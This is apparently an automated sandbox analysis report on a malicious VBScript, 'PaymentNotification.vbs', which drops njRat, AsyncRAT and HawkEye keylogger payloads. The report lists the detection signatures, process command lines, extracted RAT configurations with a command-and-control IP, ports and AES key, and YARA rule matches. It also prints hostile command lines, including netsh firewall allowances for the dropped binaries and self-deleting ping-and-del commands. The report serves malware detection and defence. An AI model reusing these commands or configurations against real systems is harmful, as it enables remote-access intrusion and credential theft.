Play interactive tour

Edit tour

Analysis Report PaymentNotification.vbs

Overview

General Information

Sample Name:	PaymentNotification.vbs
Analysis ID:	399489
MD5:	f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1:	c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256:	3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
Tags:	vbs
Infos:
Most interesting Screenshot:

Detection

HawkEye njRat AsyncRAT MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Detected HawkEye Rat

Detected njRat

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

VBScript performs obfuscated calls to suspicious functions

Yara detected AsyncRAT

Yara detected HawkEye Keylogger

Yara detected MailPassView

Yara detected Njrat

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Changes the view of files in windows explorer (hidden files and folders)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

May check the online IP address of the machine

Modifies the windows firewall

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

wscript.exe (PID: 5972 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

Tmp.exe (PID: 240 cmdline: 'C:\Users\user\AppData\Local\Temp\Tmp.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)

servieda.exe (PID: 5648 cmdline: 'C:\Users\user\AppData\Roaming\servieda.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)

netsh.exe (PID: 4592 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE MD5: 98CC37BBF363A38834253E22C80A8F32)

conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

pgr.exe (PID: 1068 cmdline: 'C:\Users\user\AppData\Local\Temp\pgr.exe' MD5: A08F2FAC257ABBBDDDBBD4439F32CFD0)

netsh.exe (PID: 5596 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

tmp87E4.tmp.exe (PID: 5036 cmdline: 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe' MD5: 6107D33B54A998C142311E55B3EC53D2)

tmpFB21.tmp.exe (PID: 4928 cmdline: 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe' MD5: 5C0E9E0C72288F8B70BB68C0036ECB52)

vbc.exe (PID: 1428 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 5824 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

d4c6a6df7bab3dad31763de990c4ed82.exe (PID: 2244 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe' MD5: 9B30598F8F05C46F8ABB22A4C2ABCC9E)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: AsyncRAT

{"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}

Threatname: Njrat

{"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "|'|'|", "Install Flag": "False"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4d30:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e88:$s3: Executed As 0x4e6a:$s6: Download ERROR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9e:$a1: netsh firewall add allowedprogram 0x4d6e:$a2: SEE_MASK_NOZONECHECKS 0x5018:$b1: [TAP] 0x4d30:$c3: cmd.exe /c ping
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6e:$reg: SEE_MASK_NOZONECHECKS 0x4e46:$msg: Execute ERROR 0x4ea2:$msg: Execute ERROR 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Roaming\servieda.exe	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
C:\Users\user\AppData\Roaming\servieda.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Roaming\servieda.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
C:\Users\user\AppData\Local\Temp\Tmp.exe	MAL_Winnti_Sample_May18_1	Detects malware sample from Burning Umbrella report - Generic Winnti Rule	Florian Roth	0xdd24:$s1: wireshark 0xdcee:$s2: procexp
C:\Users\user\AppData\Local\Temp\Tmp.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Local\Temp\Tmp.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0xf7fd:$b1: [TAP] 0xe5b7:$b2: & exit 0xf5f3:$b2: & exit 0xf5c1:$c1: md.exe /k ping 0 & del
C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\pgr.exe	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x4d30:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e88:$s3: Executed As 0x4e6a:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\pgr.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Local\Temp\pgr.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9e:$a1: netsh firewall add allowedprogram 0x4d6e:$a2: SEE_MASK_NOZONECHECKS 0x5018:$b1: [TAP] 0x4d30:$c3: cmd.exe /c ping
C:\Users\user\AppData\Local\Temp\pgr.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6e:$reg: SEE_MASK_NOZONECHECKS 0x4e46:$msg: Execute ERROR 0x4ea2:$msg: Execute ERROR 0x4d30:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8e8:$key: HawkEyeKeylogger 0x7dae2:$salt: 099u787978786 0x7bf11:$string1: HawkEye_Keylogger 0x7cd50:$string1: HawkEye_Keylogger 0x7da42:$string1: HawkEye_Keylogger 0x7c2e6:$string2: holdermail.txt 0x7c306:$string2: holdermail.txt 0x7c228:$string3: wallet.dat 0x7c240:$string3: wallet.dat 0x7c256:$string3: wallet.dat 0x7d624:$string4: Keylog Records 0x7d93c:$string4: Keylog Records 0x7db3a:$string5: do not script --> 0x7b8d0:$string6: \pidloc.txt 0x7b92a:$string7: BSPLIT 0x7b93a:$string7: BSPLIT
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf69:$hawkstr1: HawkEye Keylogger 0x7cd96:$hawkstr1: HawkEye Keylogger 0x7d0c5:$hawkstr1: HawkEye Keylogger 0x7d220:$hawkstr1: HawkEye Keylogger 0x7d383:$hawkstr1: HawkEye Keylogger 0x7d5fc:$hawkstr1: HawkEye Keylogger 0x7badb:$hawkstr2: Dear HawkEye Customers! 0x7d118:$hawkstr2: Dear HawkEye Customers! 0x7d26f:$hawkstr2: Dear HawkEye Customers! 0x7d3d6:$hawkstr2: Dear HawkEye Customers! 0x7bbfc:$hawkstr3: HawkEye Logger Details:
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf66d:$a1: netsh firewall add allowedprogram 0x2066d:$a1: netsh firewall add allowedprogram 0x3166d:$a1: netsh firewall add allowedprogram 0x4266d:$a1: netsh firewall add allowedprogram 0x5366d:$a1: netsh firewall add allowedprogram 0x6466d:$a1: netsh firewall add allowedprogram 0x7566d:$a1: netsh firewall add allowedprogram 0x8666d:$a1: netsh firewall add allowedprogram 0x9766d:$a1: netsh firewall add allowedprogram 0xa866d:$a1: netsh firewall add allowedprogram 0xb966d:$a1: netsh firewall add allowedprogram 0xca66d:$a1: netsh firewall add allowedprogram 0xdb66d:$a1: netsh firewall add allowedprogram 0xec66d:$a1: netsh firewall add allowedprogram 0xfd66d:$a1: netsh firewall add allowedprogram 0x10e66d:$a1: netsh firewall add allowedprogram 0x11f66d:$a1: netsh firewall add allowedprogram 0x13066d:$a1: netsh firewall add allowedprogram 0x14166d:$a1: netsh firewall add allowedprogram 0x15266d:$a1: netsh firewall add allowedprogram 0x16366d:$a1: netsh firewall add allowedprogram
Click to see the 18 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x16fd:$a1: netsh firewall add allowedprogram 0x188d:$b1: [TAP] 0x647:$b2: & exit 0x1683:$b2: & exit 0x1651:$c1: md.exe /k ping 0 & del
00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xf46d:$a1: netsh firewall add allowedprogram 0xf5fd:$b1: [TAP] 0xe3b7:$b2: & exit 0xf3f3:$b2: & exit 0xf3c1:$c1: md.exe /k ping 0 & del
00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9e:$a1: netsh firewall add allowedprogram 0x4b6e:$a2: SEE_MASK_NOZONECHECKS 0x4e18:$b1: [TAP] 0x4b30:$c3: cmd.exe /c ping
00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6e:$reg: SEE_MASK_NOZONECHECKS 0x4c46:$msg: Execute ERROR 0x4ca2:$msg: Execute ERROR 0x4b30:$ping: cmd.exe /c ping 0 -n 2 & del
00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe8bd:$a1: netsh firewall add allowedprogram 0xea4d:$b1: [TAP] 0xd807:$b2: & exit 0xe843:$b2: & exit 0xe811:$c1: md.exe /k ping 0 & del
0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d31d:$a1: netsh firewall add allowedprogram 0x4d4ad:$b1: [TAP] 0x4c267:$b2: & exit 0x4d2a3:$b2: & exit 0x4d271:$c1: md.exe /k ping 0 & del
00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x1031d:$a1: netsh firewall add allowedprogram 0x104ad:$b1: [TAP] 0xf267:$b2: & exit 0x102a3:$b2: & exit 0x10271:$c1: md.exe /k ping 0 & del
00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x302a4:$key: HawkEyeKeylogger 0x3249e:$salt: 099u787978786 0x308cd:$string1: HawkEye_Keylogger 0x3170c:$string1: HawkEye_Keylogger 0x323fe:$string1: HawkEye_Keylogger 0x30ca2:$string2: holdermail.txt 0x30cc2:$string2: holdermail.txt 0x30be4:$string3: wallet.dat 0x30bfc:$string3: wallet.dat 0x30c12:$string3: wallet.dat 0x31fe0:$string4: Keylog Records 0x322f8:$string4: Keylog Records 0x324f6:$string5: do not script --> 0x3028c:$string6: \pidloc.txt 0x302e6:$string7: BSPLIT 0x302f6:$string7: BSPLIT
00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x30925:$hawkstr1: HawkEye Keylogger 0x31752:$hawkstr1: HawkEye Keylogger 0x31a81:$hawkstr1: HawkEye Keylogger 0x31bdc:$hawkstr1: HawkEye Keylogger 0x31d3f:$hawkstr1: HawkEye Keylogger 0x31fb8:$hawkstr1: HawkEye Keylogger 0x30497:$hawkstr2: Dear HawkEye Customers! 0x31ad4:$hawkstr2: Dear HawkEye Customers! 0x31c2b:$hawkstr2: Dear HawkEye Customers! 0x31d92:$hawkstr2: Dear HawkEye Customers! 0x305b8:$hawkstr3: HawkEye Logger Details:
00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x3bdd8:$: VFZxUUFBT
00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xe69d:$a1: netsh firewall add allowedprogram 0xe82d:$b1: [TAP] 0xd5e7:$b2: & exit 0xe623:$b2: & exit 0xe5f1:$c1: md.exe /k ping 0 & del
00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x1e3e:$a1: netsh firewall add allowedprogram 0x1e0e:$a2: SEE_MASK_NOZONECHECKS 0x20b8:$b1: [TAP] 0x1dd0:$c3: cmd.exe /c ping
